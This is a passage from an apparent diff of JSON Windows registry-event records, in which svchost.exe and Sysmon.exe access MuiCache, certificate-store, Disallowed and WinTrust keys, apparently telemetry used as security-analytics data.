"c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": 
"{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", + "registry_value": "ROOT", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", + "registry_value": "ROOT", + "timestamp": 131883570904340000, + "unique_pid": 
"{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot", + "registry_value": "AuthRoot", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot", + "registry_value": "SmartCardRoot", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + 
"timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904340000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570904340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570904490000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570904490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 